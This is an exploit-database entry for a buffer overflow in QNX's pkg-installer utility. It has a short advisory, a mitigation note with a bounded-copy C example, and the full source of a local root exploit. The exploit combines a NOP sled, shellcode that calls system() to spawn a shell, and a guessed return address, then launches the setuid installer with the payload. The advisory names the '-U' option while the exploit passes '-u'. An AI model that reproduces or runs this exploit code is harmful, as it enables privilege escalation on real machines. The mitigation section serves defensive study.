Vendor: pkg-installer
By: badc0ded.com
CVSS: 7.2 (HIGH)
CWE: 120 (Buffer Overflow)
Product Name: pkg-installer
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: QNX
Year: 2002

QNX pkg-installer root exploit

It has been reported that the pkg-installer utility for QNX is vulnerable to a buffer overflow condition. The vulnerability is the result of an unbounded string copy of the argument to the "-U" command-line option of pkg-installer into a fixed-size local buffer.

Mitigation:

The length of the "-U" argument should be validated, or the copy bounded to the size of the destination buffer, before it is written into the local buffer; either prevents the overflow.
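The defect described above is an unbounded copy of a command-line argument into a fixed local buffer. As an added illustration (this is not pkg-installer's own code; the function names and the 64-byte buffer size are assumptions), here is that vulnerable pattern beside a bounded replacement that rejects an over-long "-U" argument instead of overrunning or silently truncating it:

```c
#include <stddef.h>
#include <string.h>

/* Assumed size of the local buffer; the real pkg-installer buffer size
 * is not published on this page. */
#define USER_BUF_LEN 64

/* Vulnerable pattern (CWE-120): the length of `arg`, which comes straight
 * from argv, is never checked, so anything longer than USER_BUF_LEN - 1
 * bytes overruns the caller's stack buffer. Shown for contrast only. */
void copy_user_option_unchecked(char *buf, const char *arg)
{
    strcpy(buf, arg);
}

/* Hardened replacement: returns 0 and fills `buf` only when the argument
 * fits including its terminating NUL; otherwise returns -1 and leaves
 * `buf` empty so the caller can fail the option cleanly. */
int copy_user_option_checked(char *buf, size_t buflen, const char *arg)
{
    size_t n;

    if (buf == NULL || buflen == 0)
        return -1;
    buf[0] = '\0';
    if (arg == NULL)
        return -1;
    for (n = 0; n < buflen; n++)   /* scan at most buflen bytes of arg */
        if (arg[n] == '\0')
            break;
    if (n == buflen)               /* no NUL within buflen: too long */
        return -1;
    memcpy(buf, arg, n + 1);       /* copies the terminator as well */
    return 0;
}

/* Minimal option loop handling only "-U <arg>", the option named in the
 * advisory; returns the result of the bounded copy, or -1 if absent. */
int parse_user_option(int argc, char **argv, char *buf, size_t buflen)
{
    int i;

    for (i = 1; i + 1 < argc; i++) {
        if (strcmp(argv[i], "-U") == 0)
            return copy_user_option_checked(buf, buflen, argv[i + 1]);
    }
    return -1;
}
```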
Source

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/4918/info

It has been reported that the pkg-installer utility for QNX is vulnerable to a buffer overflow condition.

The vulnerability is a result of an unbounded string copy of the argument to the "-U" command-line option of pkg-installer to a local buffer.
*/

/* Quick and dirty QNX pkg-installer root exploit.
 * The shellcode sucks, it is longer than it has
 * to be and you need the address to system() for
 * it to work. Yes I know I'm lazy....
 *
 * http://www.badc0ded.com
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char **argv)
{
   int ret=0x804786d;                 /* guessed return address; argv[1] subtracts an offset */
   char *pret;
   char s[]="\xeb\x0e\x31\xc0\x5b"
            "\x88\x43\x2\x53\xbb"
            "\xe4\xb4\x04\x08"       //system() address
            "\xff\xd3\xe8\xed\xff"
            "\xff\xff\x73\x68";
   char payload[2000];
   if (argc>=2)
      ret=ret-atoi(argv[1]);
   pret=(char *)&ret;                 /* raw bytes of ret, appended after the shellcode */
   printf("using ret %x\n",ret);
   memset(payload,0x90,1254);         /* 1254-byte NOP sled in front of the shellcode */
   /* "%s" on pret copies bytes until the first NUL, so it may read past the four bytes of ret */
   sprintf(payload+1254,"%s%s",s,pret);
   execlp("/usr/photon/bin/pkg-installer","pkg-installer","-u",payload,(char *)0);
   return 0;
}